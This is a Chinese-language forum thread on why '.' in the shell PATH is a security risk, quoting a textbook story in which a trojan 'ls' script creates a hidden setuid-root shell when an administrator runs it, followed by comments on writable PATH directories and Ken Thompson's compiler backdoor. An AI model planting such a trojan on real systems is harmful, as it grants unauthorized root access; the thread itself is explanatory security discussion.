找到了一个把./加到PATH里面去的安全隐患，供大家参考。。。

雨丝风片

前两天大家在讨论为什么最好不要把./加到shell的命令搜索路径中去，今天在“Practical Unix & Internet Security”这本书里面，看到作者讲了一个故事，就是利用了把./加到PATH里面去之后引起的安全隐患：

Stealing Superuser

Once upon a time, many years ago, one of us needed access to the root account on an academic machine. Although we had been authorized by management to have root access, the local system manager didn't want to disclose the password. He asserted that access to the root account was dangerous (correct), that he had far more knowledge of Unix than we did (unlikely), and that we didn't need the access (incorrect). After several diplomatic and bureaucratic attempts to get access normally, we took a slightly different approach, with management's wry approval.

We noticed that this user had "." at the beginning of his shell search path. This meant that every time he typed a command name, the shell would first search the current directory for the command of the same name. When he did a su to root, this search path was inherited by the new shell. This was all we really needed.

First, we created an executable shell file named ls in the current directory:

1. #!/bin/sh
   
2. cp /bin/sh ./stuff/junk/.superdude
   
3. chmod 4555 ./stuff/junk/.superdude
   
4. rm -f $0
   
5. exec /bin/ls ${1+"$@"}

复制代码

Then, we executed the following commands:

1. % cd
   
2. % chmod 700 .
   
3. % touch ./-f

复制代码

The trap was ready. We approached the recalcitrant administrator with the complaint, "I have a funny file in my directory I can't seem to delete." Because the directory was mode 700, he couldn't list the directory to see the contents. So, he used su to become user root. Then he changed the directory to our home directory and issued the command ls to view the problem file. Instead of the system version of ls, he ran our version. This created a hidden setuid root copy of the shell, deleted the bogus ls command, and ran the real ls command. The administrator never knew what happened.

We listened politely as he explained (superciliously) that files beginning with a dash character (-) needed to be deleted with a pathname relative to the current directory (in our case, rm ./-f); of course, we knew that.

A few minutes later, he couldn't get the new root password.


这伙人太搞笑了，把管理员玩了一圈之后，利用悄悄生成的“.superdude”
文件，他们就能够以管理员的权限为所欲为了。。。

albcamus

其实不光是.，还有$PATH的路径前缀如果含有普通用户可写的目录，且靠前，则会导致安全隐患。

雨丝风片

这倒是，万一哪个哥们把系统命令全部给替换成了他的版本呢，呵呵！
看来管理员还真难做啊。。。

win_hate

还有$PATH的路径前缀

这个是什么？

flw

[quote]原帖由 "雨丝风片"]这倒是，万一哪个哥们把系统命令全部给替换成了他的版本呢[/quote 发表：

晕～
那哥们这么厉害，该不会是管理员老爹吧？

兰花仙子

看看Ken Thompson的hack:

装了UNIX的PDP-11最早被安装在Bell Lab里供大家日常使用。很快大家就发现Ken爷爷总能进入他们的帐户，获得最高权限。Bell Lab里的科学家都心比天高，当然被搞得郁闷无比。于是有高手怒了，跳出来分析了UNIX代码，找到后门，修改代码，然后重新编译了整个UNIX。就在大家都以为“这个世界清净了”的时候，他们发现Ken爷爷还是轻而易举地拿到他们的帐户权限，百思不解后，只好继续郁闷。谁知道这一郁闷，就郁闷了14年，直到Ken爷爷道出个中缘由。原来，代码里的确有后门，但后门不在Unix代码里，而在编译Unix代码的C编译器里。每次C编译器编译UNIX的代码，就自动生成后门代码。而整个Bell Lab的人，都是用Ken爷爷的C编译器。

  

雨丝风片

原帖由 "flw" 发表：

晕～
那哥们这么厉害，该不会是管理员老爹吧？

版主别晕，albcamus不是说不要把一般用户可写的目录放到PATH的
前面去吗，如果放了，别说管理员的老爹了，管理员的孙子也能管叫
日月换新天啊，呵呵

雨丝风片

原帖由 "兰花仙子" 发表：
看看Ken Thompson的hack:

    
Stallman爷爷有没有这个嗜好？

fwizard

重要的是可写目录的管理,如果你把后门程序放在了管理员更本不会去的目录,那也等于白搭,不过理论上的可能性到是存在的